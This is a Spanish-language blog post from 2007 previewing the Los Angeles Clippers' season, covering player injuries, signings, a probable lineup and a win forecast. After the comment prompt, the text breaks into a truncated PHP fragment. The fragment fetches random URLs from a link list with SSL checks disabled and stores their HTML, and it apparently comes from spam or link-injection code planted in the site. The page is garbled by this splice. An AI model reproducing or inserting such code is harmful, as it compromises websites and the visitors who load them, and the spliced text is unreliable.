Los Angeles Clippers: el tendón de Aquiles

28 de September de 2007 por xapa_croack

Las 47 victorias junto al pase a segunda ronda de Playoffs hacen que el 2005-2006 fuera el mejor año de los Clippers en su historia. Se preveía que el curso siguiente sería aún mejor pero nadie en ese momento esperaba que las lesiones, sobre todo en la posición de base, dieran tantos quebraderos de cabeza al entrenador Mike Duleanvy.

Primero Sam Cassell, del cual se intuía que venía a California de profesor, estuvo renqueante y, con la ingle maltrecha todo el año, iba alternando partidos de veinte minutos con el banco al partido siguiente. A mitad del curso baloncestístico ocurrió la desgracia del número cuatro del draft del 2004, Shaun Livingston, quizás el jugador más querido del Staples, un base alto con mucha calidad pero demasiado frágil. Se le salió la rótula al culminar una entrada a canasta e incluso se temió por su vida profesional; finalmente parece que podrá regresar a las canchas en Marzo.

El míster entonces tuvo que improvisar y jugar el resto del año con el cortado por los Kings, el angelino Jason Hart, que sólo jugaba los minutos de la basura en la capital de California. En media temporada demostró su veteranía y en pocos partidos se hizo con la manija del equipo, hecho que no ha pasado desapercibido para los Jazz, que lo han fichado para suplir la marcha de Fisher.

Otro hecho reseñable fue el del ambidiestro Christopher Kaman, del que se esperaba que fuera uno de los mejores pívots blancos de la liga pero que, después de renovar por una gran cantidad de dinero (52 millones de dolares en 5 años), bajó considerablemente sus porcentajes de tiro.

Pese a estos percances sólo se quedaron a un partido de entrar en Playoffs.

Este año se esperaba un cambio: que, con las merecidas vacaciones, Elton Brand recuperara su nivel habitual de All Star. El año pasado Brand tuvo que sobresforzarse sin apenas vacaciones por estar con la selección en el Mundobasket de Japón, donde tuvo que jugar más minutos de la cuenta, algo que hizo mella en el rendimiento de su juego a final de campaña. El 4 de agosto, en unos entrenamientos libres, se rompió el tendón de Aquiles y el ala-pívot estará 6 meses fuera de las canchas. Las últimas noticias afirman que ya puede apoyar el pie, parece que todo va en el camino marcado y no será hasta entrado el año nuevo y el All-Star Weekend cuando se produzca su vuelta a las canchas. En función de si los Clippers están entonces con opciones de hacer algo, se le forzará.

En el puesto de base se ha incorporado al trotamundos Brevin Knight, que en Charlotte hizo los mejores números de su carrera salvo este último año, en el que tuvo problemas con la enfermería. Antes se había codeado con los mejores bases de la liga repartiendo incluso 9 asistencias por partido. Si mantiene ese nivel será titular por encima de ‘Casselmania’. Como escolta seguirá Cuttino Mobley que, con su experiencia, cada año va seleccionando mejor su lanzamiento, con un 41% en tiros de tres la pasada campaña. De alero, Corey Maggette, que con la ausencia de Brand deberá coger los galones de líder y recuperar el nivel de temporadas de más de veinte puntos por partido después de arreglar las desavenencias personales con Duleanvy del año pasado, algo que le mantuvo varios partidos apartado del equipo.

En el puesto de Brand es donde más ha trabajado la directiva, ya que junto a la baja del jugador franquicia hay que sumar la del saltarín James Singleton, que ha recalado en el Tau de Vitoria. En esa posición entrará Tim Thomas, que tendrá que compartir minutos con el rookie seleccionado en el puesto catorce Al Thornton. Tras pasar los cuatro años de la universidad en Florida, Thornton da el salto a la NBA cuajando en su última campaña una gran actuación, 19.7 puntos con más de 7 rebotes y más de un tapón por encuentro. Según los analistas, el atlético rookie puede ser de los mejor preparados para dar rendimiento inmediato en la mejor liga.

De pívot seguirá otro año Cris Kaman, que podrá mejorar su faceta reboteadora con la ausencia de ‘Mr.20-10’ e hinchar sus números. Por detrás tendrá a Alvin Williams y al jugador de segundo año Paul Davis.

Del resto del banquillo la mejor adquisición del equipo es Ruben Patterson, proveniente de los Bucks, otro veterano que podrá dar minutos de descanso a Corey Maggette. El resto de la plantilla es más bien floja. Destacamos a Josh Powell, fichado de los Golden State Warriors, donde no le han dejado casi ni debutar. También se ha repescado de Europa al tirador boricúa Guillermo Díaz, único extranjero del equipo y drafteado en segunda ronda del 2006 después de jugar en Grecia y en la República Checa.

El 2 de noviembre, frente a los Warriors, empezará otra apasionante temporada para los Clippers, tal vez con final en la post-temporada.

Probable quinteto: Cassell/Knight, Mobley, Maggette, Thomas y Kaman
Sexto hombre: Thornton
Pronóstico: 40-45 victorias.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>